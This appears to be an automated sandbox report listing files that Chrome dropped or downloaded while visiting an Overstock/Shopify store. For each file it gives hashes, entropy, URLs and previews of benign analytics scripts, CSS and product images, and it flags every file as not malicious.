                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":5,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):21318
                                                                                                                                                                                    Entropy (8bit):7.925929755578391
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:NWGZyQGyUc8yrKwZsVGRZS3ciDcFxHUMopYdFxPV3+saTc:QQGHcHKVQYyTSCH3+C
                                                                                                                                                                                    MD5:C699A4AFE20CAEE4BEF8CFB00545C41D
                                                                                                                                                                                    SHA1:397E9AA308FBAE61F85F8EB7A63C8D50BA3EE21F
                                                                                                                                                                                    SHA-256:507278AB16D88686DCBCE924256727FF1B7BA7FBDC822EF1B8F17E4C806984AE
                                                                                                                                                                                    SHA-512:29CA226830D62074B5F935F1E57F113096CE391E79AA8D438BB3D1E859046C90E78B4FC703D07748AA3C973B94AF8068E1BF4923D0A91E661B0F9AE562B65705
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.......................................................................................e...._*..R..y....L`d&$ ...,e......l.f.=^{]Y..`.A.W3.t....9}.jT.G.y.i..!...|....{1......C.1..!...AN,.qC-.d.Z...z....`...XC....?O.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1339), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1339
                                                                                                                                                                                    Entropy (8bit):5.229001559788375
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2QLmRWeyVLx7gE+oxFrHXNlDLDOLQOTjy88oqEFsGdKcR0sqRWZGKjRF2VFkZXy0:6ELxEEzxFrHzMSWqssGdR0sqw0Aj2vkJ
                                                                                                                                                                                    MD5:956F63A2A49369D5F5244CF8AD04D0BE
                                                                                                                                                                                    SHA1:1BE07A341EB069FF011FF4364069F30780186798
                                                                                                                                                                                    SHA-256:70E2780960DA0799B00EE4AD9FC7388B87E24D8617548EBBDC301818BE8E877F
                                                                                                                                                                                    SHA-512:3239E1C08CCA30333BDD8D6B2EE1D2077B5805E68B844F29F166586E19C558F266C5589C741AFB72B26F31A334C2C8EEDD1B029E0B4ECC4038F2EF5EBCF38A2C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-checkout-script.min.js?api_key=dc9d7751-8184-4d73-92ba-bc7abcb22008&sdk_url=sdk.iad-03.braze.com&shop=a37a28-2.myshopify.com&shop=a37a28-2.myshopify.com
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function t(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}const l="reconciledCheckouts";var s=null;const c=JSON.parse(localStorage.getItem("__ui"));if(c!=null&&typeof c=="object"&&c.length>2){if(c[2]!=null&&typeof c[2]=="object"&&typeof c[2][0]=="object"){s=c[2][0]["checkoutSessionIdentifier"]}}if(s==null){return}t().getDeviceId(function(e){var t=e;if(t==null){console.warn(`Cannot reconcile checkout ${s} because Braze device ID cannot be obtained`)}else{const c=JSON.parse(localStorage.getItem(l)||"{}");const n=c[s]||null;if(n==t){return}else{c[s]=t;localStorage.setItem(l,JSON.stringify(c))}const o=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-checkout-script")));const i=new URLSearchParams(o.search);const r=Object.fromEntries(i.entries());fetch("https://"+r["sdk_url"]+`/a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):59337
                                                                                                                                                                                    Entropy (8bit):5.358255541410134
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:gU1UkXFRMDo8L2pbYMN+Yzh6I/dLeSpFgowQNqoKOGUMIYbfrwEAvRhsRYjOT9B2:L8azqjTEwsVUGt0kiwP9Gxsld9
                                                                                                                                                                                    MD5:A6622476D21B1C3EDC8E08BF9F59ACFA
                                                                                                                                                                                    SHA1:29DA3582AEE99E8945E11CA8C703CB73E1189FBE
                                                                                                                                                                                    SHA-256:28EC2EDEF2A5CE0164F7E968E6B580A3797B2DF6CC84AC3DC7C8697610EE5E19
                                                                                                                                                                                    SHA-512:66A6515A462A8C53CCE9AFAAD231D0495C0CDE9E51393EBC8CECFE56FE55969775196826EA362B3AB0A3553364615CCB280940D6814ED54F534E2FD4346AA357
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{cookies_enabled:true},ajax:{deny_list:["bam.nr-data.net"]}};..;NREUM.loader_config={accountID:"4571703",trustKey:"2725444",agentID:"1386192029",licenseKey:"NRJS-6aaad96844ded12b7e9",applicationID:"1386192029"};.;NREUM.info={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",licenseKey:"NRJS-6aaad96844ded12b7e9",applicationID:"1386192029",sa:1};.;/*! For license information please see nr-loader-spa-1.265.1.min.js.LICENSE.txt */.(()=>{var e,t,r={8122:(e,t,r)=>{"use strict";r.d(t,{a:()=>i});var n=r(944);function i(e,t){try{if(!e||"object"!=typeof e)return(0,n.R)(3);if(!t||"object"!=typeof t)return(0,n.R)(4);const r=Object.create(Object.getPrototypeOf(t),Object.getOwnPropertyDescriptors(t)),o=0===Object.keys(r).length?e:r;for(let a in o)if(void 0!==e[a])try{if(null===e[a]){r[a]=null;continue}Array.isArray(e[a])&&Array.isArray(t[a])?r[a]=Array.from(new Set([...e[a],...t[a]])):"object"==typeof e[a]&&"object
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4413)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4414
                                                                                                                                                                                    Entropy (8bit):5.085793650664478
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:K7kM4797A7GK9VwMN6FLUMgeJR7oh9wQ8z8+4eJN9qpyqddC0mx:RBsCK9VwMNSLUMgcuh9YI+4EN9ITbAx
                                                                                                                                                                                    MD5:C404893E8DB5BC1C3650EC1FCF674046
                                                                                                                                                                                    SHA1:B12072A0A3A5F82DECFBDA8F98D582B569EDD157
                                                                                                                                                                                    SHA-256:DAAA0C72017B3EB7959CFF3801DEFB82C705B9D63827F7F0A2965E160DF70941
                                                                                                                                                                                    SHA-512:4ABD297D690ADA1616C3FFC8663E38A2A76CAB56B55FC28B0FB211918EF51FDE11EFA2B5CEEB1AD05B32295F435731BBF51074EFA0C3F1613F07FA0C5DC44878
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/OnePage.BL1uXB7_.css
                                                                                                                                                                                    Preview:.bAwqP{word-break:break-word}.sYMP2{line-height:1}.sYMP2:not(.aPplN):hover{background-color:var(--x-default-color-background-subdued)}.N5SeL{border-radius:var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) )}.fdTMm{display:inline-block}[dir=ltr] .ekZTm{padding-left:var(--x-spacing-small-400)}[dir=rtl] .ekZTm,[dir=ltr] .ekZTm{padding-right:var(--x-spacing-small-400)}[dir=rtl] .ekZTm{padding-left:var(--x-spacing-small-400)}[dir=ltr] .UmHzB{padding-left:var(--x-spacing-small-300)}[dir=rtl] .UmHzB,[dir=ltr] .UmHzB{padding-right:var(--x-spacing-small-300)}[dir=rtl] .UmHzB{padding-left:var(--x-spacing-small-300)}[dir=ltr] .JPhUL{padding-left:var(--x-spacing-base)}[dir=rtl] .JPhUL,[dir=ltr] .JPhUL{padding-right:var(--x-spacing-base)}[dir=rtl] .JPhUL{padding-left:var(--x-spacing-base)}._7k6aq{padding-top:var(--x-spacing-small-400);padding-bottom:var(--x-spacing-small-400)}.CmqN5{padding-top:var(--x-spacing-small-300);padding-bottom:var(--x-spacing
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5992)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6091
                                                                                                                                                                                    Entropy (8bit):4.968528413803144
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:RvWdi2jkoBS4z0J4T0VnOHy+OkWa3jiXQs5dJSyLMZ+x3Eu0QF1eUFl:RvWdEooB1CjWa3jixdzLjVEujnesl
                                                                                                                                                                                    MD5:06DAE6D840E1DE38935FB53C3D877D37
                                                                                                                                                                                    SHA1:D8B0A0C1D11562248DC11FA84527E4F8EEE671AA
                                                                                                                                                                                    SHA-256:2D4BE43A243E6073DB8C0B4B71A1F9DB54FD3CF8487DB39AB60F0D45BBB48D32
                                                                                                                                                                                    SHA-512:4AF6517D6035DBC333C44F761CB252893506790A5E2416DB55D8111C05316A6907701C9DBAA4D0187011070C98654B1F0BEB7F661D940BC94228D8CA721C3679
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/custom-select.js?v=147432982730571550041730157903
                                                                                                                                                                                    Preview:if(!customElements.get("custom-select")){class CustomSelect extends HTMLElement{constructor(){super(),this.button=this.querySelector(".custom-select__btn"),this.listbox=this.querySelector(".custom-select__listbox"),this.selectedOption=this.querySelector('[aria-selected="true"]'),this.selectedOption||(this.selectedOption=this.listbox.firstElementChild),this.setButtonWidth(),window.initLazyScript(this,this.init.bind(this))}init(){this.options=this.querySelectorAll(".custom-select__option"),this.nativeSelect=document.getElementById(`${this.id}-native`),this.swatches="swatch"in this.options[this.options.length-1].dataset,this.focusedClass="is-focused",this.searchString="",this.listboxOpen=!1,this.selectedOption=this.querySelector('[aria-selected="true"]'),this.selectedOption||(this.selectedOption=this.listbox.firstElementChild),this.addEventListener("keydown",this.handleKeydown.bind(this)),this.button.addEventListener("mousedown",this.handleMousedown.bind(this))}static getNextVisibleSiblin
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12875), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12875
                                                                                                                                                                                    Entropy (8bit):5.229604496973644
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:YNQ6j5r9VBR0fUjk9Y9jnGhNPlIU628IubH6DezHkeqr17ctOo4o+KQCYqKEI0SQ:MjzQnnerg0XJrq67AcYeXVivod
                                                                                                                                                                                    MD5:F34D38C90923A3CF0A95695C11A3169B
                                                                                                                                                                                    SHA1:EDCCC3165018181940C8F5C509B596AE1F5BC635
                                                                                                                                                                                    SHA-256:EFF2497F10D71BBCD02C4372EFD22F3C7D74ED699A57073CCF912BD23CECACF4
                                                                                                                                                                                    SHA-512:EDFC5F14B2E266904E17841ED0BAE77E693DFC9CBDB2678718EB9FB166D6D6B49AF30134B925D0050F770730A2925F7CBC14096BF5B4F40262B10B46FD235CC8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){var r=[],o=!0,a=!1,n=void 0;try{for(var i,s=e[Symbol.iterator]();!(o=(i=s.next()).done)&&(r.push(i.value),!t||r.length!==t);o=!0);}catch(e){a=!0,n=e}finally{try{!o&&s.return&&s.return()}finally{if(a)throw n}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),r=function(e){return e&&e.__esModule?e:{default:e}},o=function(e){if(Array.isArray(e)){for(var t=0,r=Array(e.length);t<e.length;t++)r[t]=e[t];return r}return Array.from(e)},a=e((function(e,t){"use strict";function r(e){"loading"!==document.readyState?e():document.addEventListener?document.addEventListener("DOMContentLoaded",e):document.attachEvent("onreadystatechange",(function(){"loading"!==document.readyState&&e()}))}Object.defineProperty(t,"__esModule",{value:!0}),t.default
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (27377)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):27592
                                                                                                                                                                                    Entropy (8bit):4.83669575258768
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Euwu4Eyfd7PNRzAmReUtPAM0NuzwpmnWt:ETuqdNReUtPAM0v4E
                                                                                                                                                                                    MD5:5E5B0D8C7BE5919570A305B6BC229A36
                                                                                                                                                                                    SHA1:E4AB3A85D3AB0A8654A278D954FB310906526DB3
                                                                                                                                                                                    SHA-256:1AE3C19265723696F50E3226DCD43FBC7EA617697E0D7169A8E52C854AE3826C
                                                                                                                                                                                    SHA-512:7FB88208B7D2E585F6C2B49BAF85AEF8D374A1C3F565596B50FFE49F2B5B6B5E1B39DADFCCC0E9971000346957551DA6316A911CDEED502B1983EB1598F37D62
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v4-shims.min.css?token=541968e6a0
                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle-o-dow
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2203)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):19691
                                                                                                                                                                                    Entropy (8bit):4.757167799122979
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Yxbm1/VTIfM+GrpIfD12nh6XB2JbcX/fM+GrpIfD12nh6XB2Jbs1:GvfDGrODYhg2JgvfDGrODYhg2JA1
                                                                                                                                                                                    MD5:5F1133E8094DEB965B9C619BEF832F25
                                                                                                                                                                                    SHA1:C104C27B6369C2523CBFB9029E48E58BC68D4F5B
                                                                                                                                                                                    SHA-256:E93849057F424BC259725D097296CDDFDF067C1D497A5BB70510E5E7DEF3B102
                                                                                                                                                                                    SHA-512:071BF9633AB3F9533CAF3631CAEC0268F0F92C842EDD7B1C986EB35AFC3FEBAFDC50CCF602D0F78E478EC59BFD20E241FF85842D7067AA3D910170056318AA96
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:class ContentCards extends HTMLElement{constructor(){super(),this.closeBtn=this.querySelector("#close"),this.body=document.querySelector("body"),this.refreshBtn=this.querySelector("#refresh"),this.refreshBtn&&this.refreshBtn.addEventListener("click",()=>{this.refreshBtn.querySelector("svg").classList.add("rotate"),this.refreshCards()}),this.closeBtn.addEventListener("click",this.toggleModal.bind(this)),this.cards,window.addEventListener("load",()=>{setTimeout(()=>{braze.subscribeToContentCardsUpdates(),braze.requestContentCardsRefresh(),this.cards=braze.getCachedContentCards().cards,this.cards.length>0?(this.renderCards(this.cards),this.querySelector("#refresh").classList.remove("hidden")):this.renderEmpty(),this.setBadge(this.getUnreadCardCount())},1e3)}),document.querySelector(".head-slot-bell").addEventListener("click",()=>{braze.logContentCardImpressions(braze.getCachedContentCards().cards),this.toggleModal()}),document.addEventListener("click",e=>{!e.target.closest(".content-cards
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (34521)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):201385
                                                                                                                                                                                    Entropy (8bit):5.447481278055856
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:HK7KioxbKxKGW5iWFsV17KoKioxbKhKBW5m6b6vF6ysFVJF07NdfxFg9IWRn6b6J:HK7KhbKxKijKoKhbKhKjjsNJRH
                                                                                                                                                                                    MD5:340DF0E7EDF2DFA9EA52184578DAA73E
                                                                                                                                                                                    SHA1:B458D84CEB03446CE9930FF09A791D9BC0249274
                                                                                                                                                                                    SHA-256:DA61397D84B1844C8958DAB0ADD4C2E5DF8FD1081608B053C2B573276AFE318D
                                                                                                                                                                                    SHA-512:409A24F67793CB1E172BBF5FC3E44392A619528ADC864085B38D00BB71E0F167070061814B0F0B34BC07871C39EFA074D1435A33252E93EACC5CE05C96122619
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:this.Handlebars=this.Handlebars||{},this.Handlebars.templates=this.Handlebars.templates||{},this.Handlebars.templates["cluborewards-footer"]=Handlebars.template(function(Handlebars,depth0,helpers,partials,data){return this.compilerInfo=[4,">= 1.0.0"],helpers=this.merge(helpers,Handlebars.helpers),data=data||{},'<div class="dynaban-footer-clubORewards"><div class="os-icon os-icon-club-o-rewards"></div><div class="clubo-text-container"><span class="clubo-heading reward-heading">EXTRA REWARDS STORE</span><span class="clubo-text bold">Exclusively for Club O Gold Members</span><span class="clubo-text italic">Earn up to 40% back</span></div><a class="clubo-btn os-btn btn-md loyalty" data-tid="SW:FO:ClubOXRewards:ShopNow" href="https://www.overstock.com/Club-O-Extra-Rewards-Store,/club-o-extra-reward,/results.html" target="_blank">Shop Now</a></div>'}),this.Handlebars.templates["clubo-footer"]=Handlebars.template(function(Handlebars,depth0,helpers,partials,data){this.compilerInfo=[4,">= 1.0.0
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):79
                                                                                                                                                                                    Entropy (8bit):2.716326985350135
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:tQTltaL5UJjV9GjUJjVE:6XG5UJjGjUJj2
                                                                                                                                                                                    MD5:8E3DB10AF5A3E1CABE7AA67674E21188
                                                                                                                                                                                    SHA1:E2314B0038DF2D49DDBE461F33A6797D4586CDE0
                                                                                                                                                                                    SHA-256:87ECD5BABD6FD9F4F6F796D745AA38751FAF3985E3B55F87A2F53E506FE07362
                                                                                                                                                                                    SHA-512:A4F136016F4591E021D54F06141896581371828BF02F662A050B2A36567DFEC6068A4C758815D481E01BD7D68692329B5EE228C854AB2D85246D05B56692FB09
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[71, 73, 70, 56, 57, 97, 1, 0, 1, 0, 0, 0, 0, 44, 0, 0, 0, 0, 1, 0, 1, 0, 0, 2]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3126
                                                                                                                                                                                    Entropy (8bit):7.513075892649133
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:WIl/Xflh3hWi0I0K+k9MQXp/o2Fyikx3U7MFvb5c/FA+EW/WiNGhAXSG:WIl/XtlJ7iQ5jdkxU7Oj5mfRNGhMSG
                                                                                                                                                                                    MD5:03022C2817EE3B766749F23626C8A07F
                                                                                                                                                                                    SHA1:5C108CA1300DBEC11FBB67F0B0FCE243804C62B2
                                                                                                                                                                                    SHA-256:0EA4D9EDF93AC56B25E00BBD45553C6D0FA97A366FD8401553D2C925AF63747D
                                                                                                                                                                                    SHA-512:AA16B1FA53807EBF61A520C6B09C04103C8628302349B071BA15C2E96FFF70E2ADE797DEA25E3C1FB9CCEC4397F8AD59CA979E2DA5A4F3044385C455FFC70199
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_c82b4512-34e4-4b05-99f5-48d293dd5dec.jpg?v=1729322987&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....%...*P.P.>1..B.!.......P.T{D...pk..Kq...W..._.....[....)?.<.@?.............+.?....O{.......}.0.....=I.]o..@O.?.=X4......g.oE.......@EV...p..X.X.K`.VxG..GI+..&!:.i?....s..jP..../p.]h.....^xF..UBm..'o...Y..v.......X_J.m.#..S.F/.......}.~'...p.L&.B.+.... X...N.{Z..89}u....Y._W.c...&.......O...b......O....%Q..D.#.r. ..X..]S..;n..%..t..>h.......|c...".....(..eK^Ll=5..^@.x.~.u...#s..9... .1.PK.XH.f.....g.k.p.\.........../{....i.1.^.R...Vq.R..v.u<....@m..z9..8.....M......AV.Y.s...g..?~...'.Q!...cO.X.SI.....i:.<
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1108
                                                                                                                                                                                    Entropy (8bit):6.038006609949591
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:pTCpzWl/X27spAPAlXRIydOviuB11C1+/MdSix6HbiCGUwSammWv0jri3omqrmfI:pTCIl/X2YlXWI2PU9QGUygz4x98UC
                                                                                                                                                                                    MD5:1ADDE741E31925A2448094FA427B1C8D
                                                                                                                                                                                    SHA1:9979D1718CF67A862DE184FA01DA2BAD639770DB
                                                                                                                                                                                    SHA-256:54121DF63C8E39FF4D6A87CD6648B1004235D7E7E451AD3D3CD937BBAC7E8BF7
                                                                                                                                                                                    SHA-512:4ED419F6FCDC7F1398969031AEABFA4DAE8436EA964F03A765785CB825681AD7D9AB3A83B9792D59E345ECE5D5DB9AC7A57F0E93527E6850D089C6754E2C5B91
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_81e79114-fc88-4a23-b7ca-ebcc206fe24b.jpg?v=1729322982&width=80
                                                                                                                                                                                    Preview:RIFFL...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!.......Z@5.+...F2...@..[..9...%.]..W.@.t.$pn..tL...>.R.D...Zw).w.}Z............ $.....u.T............W.....RK/.?~VD..?.....3.T.J..{...,>...F..........q. U.."l'#..kP...f...c3..o.Er?o..,..~.{.0H.v'.R7.....n......}..u>.Y....(.p.V.e....H.. 8)../.....f.0..Ba...6.....J.{4.o.R.D.u.N...4..XK.<..%..l.......qt..-.......^.q............w.c...4j.....v\J....9..x.....{..dX^..M..?@..B.Vx.>....&..m.r.....W,Ce..L..7.6 ...EXIF....Exif..II*...........................V...........^...(.......................i.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                    Entropy (8bit):7.217017672363257
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxxxtDZxPCvgzzFbV63A3qxakrIXhCj3msS3/InbBumTZVl2:NBIl/Xrxx7DZNZFbV4o+rIXMj3ms2INE
                                                                                                                                                                                    MD5:DE7CBEC8EE49D49588A04527EFF6E956
                                                                                                                                                                                    SHA1:18F9466587571748E1392C9AFE6E4FACCDBD344F
                                                                                                                                                                                    SHA-256:A09EDD2D2DA6E7E2810546AA03119746DF705C4C2B4E853111E70CFF92ABCF69
                                                                                                                                                                                    SHA-512:E21058A439356F7637D1657D690DB1B4FD26E59A801C23F283DF8CADC3C83B06A1C7C2909E211F44223F094D7767FACC8D96A83C74C6DFDB6F519EC11F890AF7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................k:.N.AQ"......Y......,..*V..D....C .....B.....m.....J.P.1...[....oU...?......WC....:y..]....o.....c...%.U.=......Q.......0..6w..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):9637
                                                                                                                                                                                    Entropy (8bit):7.841505591475475
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:rG0OiiqDRjOHRJ0MZWvFvHUcmLZ0FmFww66ZX8WiNykO74bgb:rv1UHRJPWNfUcmLcCwR61ZLkOMbW
                                                                                                                                                                                    MD5:FB97B2F92D396249A453801866D9E009
                                                                                                                                                                                    SHA1:8873E27CA9ACFDACBDEB7BD0579059AF3DB74F83
                                                                                                                                                                                    SHA-256:5707B839A14B9048229931B23232FBC45948F70F8A409508B4FA4189F70ACD5E
                                                                                                                                                                                    SHA-512:B12C342FC4B500FC51D61E9BBBE0C6F3DF52EB8C210A722E6B0CD2F5E477197D0B9697FD15887CA71375997A2B4992C7B593563C666DEA4E2A6D8683E4803C81
